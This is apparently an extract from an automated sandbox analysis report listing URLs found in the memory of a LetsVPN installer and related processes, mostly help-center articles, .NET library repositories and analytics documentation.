              Source: letsvpn-latest.exe, 00000015.00000002.2781360538.0000000000696000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2227804272.000000000275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1wm27s.onelink.me/DPiD/s5eizipo-1
              Source: letsvpn-latest.exe, 00000015.00000002.2781360538.0000000000696000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2227804272.000000000275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1wm27s.onelink.me/DPiD/zpbo7ig1https://1wm27s.onelink.me/DPiD/s5eizipoopen
              Source: letsvpn-latest.exe, 00000015.00000002.2781360538.0000000000696000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2227804272.000000000275F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1wm27s.onelink.me/DPiD/zpbo7ig1open
              Source: LetsPRO.exe, 0000003D.00000002.3421442999.000000000ED0E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://WSARecv0.0.0.0%2F0infoinfoinfoinfofalse
              Source: powershell.exe, 0000001B.00000002.2590832104.0000000004721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: letsvpn-latest.exe, 00000015.00000003.2421605703.0000000003107000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/systemdrawingnonwindows
              Source: letsvpn-latest.exe, 00000015.00000003.2347348631.0000000003100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/toolkit/dotnet
              Source: letsvpn-latest.exe, 00000015.00000003.2393237093.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2345688003.0000000003103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.github.com/#
              Source: powershell.exe, 0000001B.00000002.2594140593.0000000005789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000001B.00000002.2594140593.0000000005789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000001B.00000002.2594140593.0000000005789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: LetsPRO.exe, 0000003D.00000002.3436681058.000000003823A000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3432239162.00000000380F2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:51:0
              Source: LetsPRO.exe, 0000003D.00000002.3436681058.000000003823A000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3432239162.00000000380F2000.00000004.00001000.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3432239162.0000000038082000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:51:0
              Source: LetsPRO.exe, 0000003D.00000002.3432239162.0000000038082000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:51:0C:
              Source: letsvpn-latest.exe, 00000015.00000003.2520982126.00000000031F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d1dmgcawtbm6l9.cloudfront.net/rest-apiinvalid
              Source: letsvpn-latest.exe, 00000015.00000003.2357553464.0000000003108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/analytics/devguides/collection/protocol/ga4/reference?client_type=gtag
              Source: letsvpn-latest.exe, 00000015.00000003.2357553464.0000000003108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/analytics/devguides/collection/protocol/ga4/sending-events?client_type
              Source: letsvpn-latest.exe, 00000015.00000003.2357553464.0000000003108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/analytics/devguides/collection/protocol/ga4/user-properties?client_typ
              Source: svchost.exe, 0000000D.00000003.2167055659.0000020B583AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
              Source: svchost.exe, 0000000D.00000003.2167055659.0000020B58350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
              Source: letsvpn-latest.exe, 00000015.00000003.2371393124.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/CommunityToolkit/WindowsCommunityToolkit
              Source: letsvpn-latest.exe, 00000015.00000003.2371393124.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/CommunityToolkit/WindowsCommunityToolkitO
              Source: letsvpn-latest.exe, 00000015.00000003.2347348631.0000000003100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/CommunityToolkit/dotnet
              Source: letsvpn-latest.exe, 00000015.00000003.2380231891.0000000003105000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000002.2711648046.0000000005742000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
              Source: powershell.exe, 0000001B.00000002.2590832104.0000000004876000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: letsvpn-latest.exe, 00000015.00000003.2503243921.0000000003108000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2456485776.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2399020374.000000000310E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf
              Source: letsvpn-latest.exe, 00000015.00000003.2503243921.0000000003108000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2456485776.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2399020374.000000000310E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/30ab651fcb4354552bd4891619a0bdd81e0ebdbf8
              Source: letsvpn-latest.exe, 00000015.00000003.2441458716.0000000003108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e3958
              Source: letsvpn-latest.exe, 00000015.00000003.2441458716.0000000003108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/32b491939fbd125f304031c35038b1e14b4e39588
              Source: letsvpn-latest.exe, 00000015.00000003.2493596023.0000000003105000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2394947957.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f
              Source: letsvpn-latest.exe, 00000015.00000003.2493596023.0000000003105000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2394947957.000000000310F000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003D.00000002.3417338256.0000000005916000.00000002.00000001.01000000.00000024.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f8
              Source: letsvpn-latest.exe, 00000015.00000003.2433009064.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7ee84596d92e178bce54c986df31ccc52479e772
              Source: letsvpn-latest.exe, 00000015.00000003.2433009064.000000000310A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7ee84596d92e178bce54c986df31ccc52479e7728
              Source: letsvpn-latest.exe, 00000015.00000003.2432280356.0000000003101000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2406641167.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2402252974.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2369792600.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2492363095.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2434348436.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2488139644.000000000310F000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2479924642.0000000003104000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2482115637.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2489791226.0000000003104000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374971901.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2395719645.0000000003105000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2376355832.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2421605703.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2410824087.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2481329381.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2405745648.000000000310B000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2488820018.000000000310E000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2412144630.0000000003105000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2478524484.0000000003100000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2470703706.0000000003105000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
              Source: letsvpn-latest.exe, 00000015.00000003.2369792600.000000000310A000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2374971901.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2410824087.0000000003102000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime&
              Source: letsvpn-latest.exe, 00000015.00000003.2486208547.000000000310D000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2486911961.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2485461661.0000000003109000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2487551781.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2503983529.0000000003105000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2484710672.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/wcf
              Source: letsvpn-latest.exe, 00000015.00000003.2387449334.0000000003101000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnetprojects/SVGImage
              Source: letsvpn-latest.exe, 00000015.00000003.2393237093.0000000003106000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2345688003.0000000003103000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/myuser/myrepo
              Source: letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://in.appcenter.ms
              Source: letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://in.appcenter.ms./logs?api-version=1.0.0
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2780068-%E5%A6%82%E4%BD%95%E4%B8%8B%E8%BD%BD%E5%BE%9
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2825583-killer-%E7%BD%91%E5%8D%A1%E9%9C%80%E8%A6%81%
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2830282-%D0%BE%D0%B1%D1%80%D0%B0%D1%82%D0%B8%D1%82%D
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2830420-special-settings-for-killer-networking-produ
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2907458-%E6%8F%90%E7%A4%BA%E7%BB%91%E5%AE%9A%E8%AE%B
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2907649-%E9%80%9A%E8%BF%87%E7%94%B3%E8%BF%B0%E6%89%B
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2919829-%D0%BA%D0%B0%D0%BA-%D0%BF%D0%BE%D0%BB%D1%83%
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2922442-%D1%87%D1%82%D0%BE-%D0%B4%D0%B5%D0%BB%D0%B0%
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2923401-%D0%BA%D0%B0%D0%BA-%D0%BF%D0%BE%D0%B6%D0%B0%
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2925752-how-to-download-letsvpn
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2926044-what-if-i-reached-maximum-connection-limit
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/2926062-recover-my-letsvpn-account
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3076586-ipv6-%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE%E9
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3081101-adjust-the-settings-for-ipv6
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3083439-%d1%87%d1%82%d0%be-%d0%b4%d0%b5%d0%bb%d0%b0%
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3083562-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3130411-smartbyte-%E8%BD%AF%E4%BB%B6%E9%9C%80%E8%A6%
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3401886-special-settings-for-smartbyte
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3706909-%E8%B4%A6%E6%88%B7%E7%B3%BB%E7%BB%9F%E6%97%A
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3710603-about-logging-in-out-anomalies
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/3710827-%D0%B7%D0%B0%D1%8F%D0%B2%D0%BB%D0%B5%D0%BD%D
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8259671-expressconnect-%E6%9C%8D%E5%8A%A1%E9%9C%80%E
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8260054-killer-%E7%BD%91%E5%8D%A1%E6%9C%8D%E5%8A%A1%
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8260070-intel-connectivity-service-%E9%9C%80%E8%A6%8
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8260083-host-network-service-%E9%9C%80%E8%A6%81%E7%8
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262690-special-settings-for-intel-connectivity-serv
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262720-special-settings-for-host-network-service
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262786-special-settings-for-expressconnect
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262801-special-settings-for-killer-network-service
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262818-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262867-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262897-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8262909-%D1%81%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8263010-windows-%E5%A6%82%E4%BD%95%E6%B8%85%E7%90%86
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8263068-how-to-delete-hosts-in-windows
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/articles/8263093-%D0%BA%D0%B0%D0%BA-%D1%83%D0%B4%D0%B0%D0%BB%
              Source: letsvpn-latest.exe, 00000015.00000003.2558570579.0000000003107000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2557572351.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2551617958.0000000003102000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2550819271.000000000310C000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000015.00000003.2559553635.0000000003104000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/collections/1611781-%E4%B8%AD%E6%96%87%E5%B8%AE%E5%8A%A9
              Source: letsvpn-latest.exe, 00000015.00000003.2540388377.000000000310F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/collections/1627706-%D0%BF%D0%BE%D0%BC%D0%BE%D1%89%D1%8C-%D1%
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmp, LetsPRO.exe, 0000003D.00000002.3395428987.00000000024D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/collections/1628560-help-documents
              Source: letsvpn-latest.exe, 00000015.00000003.2360789274.0000000003103000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 0000003B.00000000.2693507418.0000000000712000.00000002.00000001.01000000.00000019.sdmpString found in binary or memory: https://intercom.help/letsvpn-world/en/collections/Killer
